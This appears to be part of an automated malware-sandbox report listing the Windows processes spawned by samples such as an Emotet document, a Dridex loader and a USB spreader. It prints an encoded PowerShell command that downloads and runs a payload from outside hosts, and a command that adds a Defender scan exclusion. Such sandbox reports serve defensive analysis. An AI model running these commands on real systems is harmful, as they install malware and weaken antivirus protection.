                                                                                                                                                    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\archive\Torrentator\Trackers 2011.txt
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5780
                                                                                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\archive\Torrentator\READ ME.txt
                                                                                                                                                      1⤵
                                                                                                                                                        PID:5872
                                                                                                                                                      • C:\Users\Admin\Downloads\archive\USB Spreader\USB_Spreader.exe
                                                                                                                                                        "C:\Users\Admin\Downloads\archive\USB Spreader\USB_Spreader.exe"
                                                                                                                                                        1⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:6024
                                                                                                                                                      • C:\Users\Admin\Downloads\archive\QuikNEZ\QuikNEZUpdater.exe
                                                                                                                                                        "C:\Users\Admin\Downloads\archive\QuikNEZ\QuikNEZUpdater.exe"
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        PID:2888
                                                                                                                                                      • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\archive\QuikNEZ\readme.txt
                                                                                                                                                        1⤵
                                                                                                                                                        • Opens file in notepad (likely ransom note)
                                                                                                                                                        PID:5436
                                                                                                                                                      • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\archive\QuikNEZ\spreading guide.pdf"
                                                                                                                                                        1⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5528
                                                                                                                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                                                                                          2⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:5060
                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=2E1FC07F8767BC0A4A54302FC4FDEAAC --mojo-platform-channel-handle=1760 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                            3⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:2692
                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BA9B0493FB2D884ABDE49625184E0D81 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BA9B0493FB2D884ABDE49625184E0D81 --renderer-client-id=2 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                            3⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5756
                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9049038EBE42374271E9CA183EA0294B --mojo-platform-channel-handle=2300 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                            3⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:4952
                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=831B4B448828E807B5A3C4E54F0F4187 --mojo-platform-channel-handle=1872 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                            3⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5984
                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A8FF9B5F39AD0AB636BD44465A850AE5 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A8FF9B5F39AD0AB636BD44465A850AE5 --renderer-client-id=6 --mojo-platform-channel-handle=2540 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                            3⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5552
                                                                                                                                                      • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\archive\description.txt
                                                                                                                                                        1⤵
                                                                                                                                                        • Opens file in notepad (likely ransom note)
                                                                                                                                                        PID:5212
                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5920
                                                                                                                                                      • C:\Windows\system32\OpenWith.exe
                                                                                                                                                        C:\Windows\system32\OpenWith.exe -Embedding
                                                                                                                                                        1⤵
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5104
                                                                                                                                                        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                          "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\Downloads\DridexLoader.bin.exe.c26203af4b3e9c81a9e634178b603601"
                                                                                                                                                          2⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                          PID:5720
                                                                                                                                                          • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                            "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                                                                                            3⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5600
                                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4B8E4C0E5D37B450699795EEA4FC109D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4B8E4C0E5D37B450699795EEA4FC109D --renderer-client-id=2 --mojo-platform-channel-handle=1656 --allow-no-sandbox-job /prefetch:1
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5504
                                                                                                                                                            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E22684EC620F0073D093BE224A3F333B --mojo-platform-channel-handle=1924 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                                                                                                                                                              4⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5908
                                                                                                                                                      • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                                        C:\Windows\SysWOW64\DllHost.exe /Processid:{5AAABB05-F91B-4BCE-AB18-D8319DEDABA8}
                                                                                                                                                        1⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:6076
                                                                                                                                                      • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
                                                                                                                                                        "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\Emotet\[email protected]" /o ""
                                                                                                                                                        1⤵
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:5480
                                                                                                                                                        • C:\Windows\splwow64.exe
                                                                                                                                                          C:\Windows\splwow64.exe 12288
                                                                                                                                                          2⤵
                                                                                                                                                            PID:3612
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMgAvAEAAaAB0AHQAcABzADoALwAvAGEAdABuAGkAbQBhAG4AdgBpAGwAbABhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAA3ADMANwAzADUALwBAAGgAdAB0AHAAcwA6AC8ALwB5AGUAdQBxAHUAeQBuAGgAbgBoAGEAaQAuAGMAbwBtAC8AdQBwAGwAbwBhAGQALwA0ADEAOAAzADAALwBAAGgAdAB0AHAAcwA6AC8ALwBkAGUAZQBwAGkAawBhAHIAYQBpAC4AYwBvAG0ALwBqAHMALwA0AGIAegBzADYALwAnAC4AIgBzAFAATABgAGkAVAAiACgAJwBAACcAKQA7ACQAbAA0AHMASgBsAG8ARwB3AD0AJwB6AEkAUwBqAEUAbQBpAFAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFYAMwBoAEUAUABNAE0AWgAgAGkAbgAgACQAcABMAGoAQgBxAEkATgBFACkAewB0AHIAeQB7ACQAdQA4AFUAQQByADMALgAiAEQATwB3AGAATgBgAGwATwBhAEQAZgBpAGAATABlACIAKAAkAFYAMwBoAEUAUABNAE0AWgAsACAAJABGAHcAYwBBAEoAcwA2ACkAOwAkAEkAdgBIAEgAdwBSAGkAYgA9ACcAcwA1AFQAcwBfAGkAUAA4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQARgB3AGMAQQBKAHMANgApAC4AIgBMAGUATgBgAGcAVABoACIAIAAtAGcAZQAgADIAMwA5ADMAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJABGAHcAYwBBAEoAcwA2ACkAOwAkAHoARABOAHMAOAB3AGkAPQAnAEYAMwBXAHcAbwAwACcAOwBiAHIAZQBhAGsAOwAkAFQAVABKAHAAdABYAEIAPQAnAGkAagBsAFcAaABDAHoAUAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJAB2AFoAegBpAF8AdQBBAHAAPQAnAGEARQBCAHQAcABqADQAJwA=
                                                                                                                                                          1⤵
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                          PID:5124
                                                                                                                                                        • C:\ProgramData\ChromesSoftware\XOYOX.exe
                                                                                                                                                          C:\ProgramData\ChromesSoftware\XOYOX.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2556
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
                                                                                                                                                            2⤵
                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:2672
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                          1⤵
                                                                                                                                                            PID:3404
                                                                                                                                                          • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
                                                                                                                                                            "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
                                                                                                                                                            1⤵
                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                            • Modifies registry class
                                                                                                                                                            PID:2008
                                                                                                                                                          • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                            C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4092
                                                                                                                                                            • C:\Windows\System32\CompPkgSrv.exe
                                                                                                                                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6288
                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2120
                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:6872
                                                                                                                                                                  • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                    "LogonUI.exe" /flags:0x4 /state0:0xa39a4855 /state1:0x41c64e6d
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:6268

                                                                                                                                                                    Network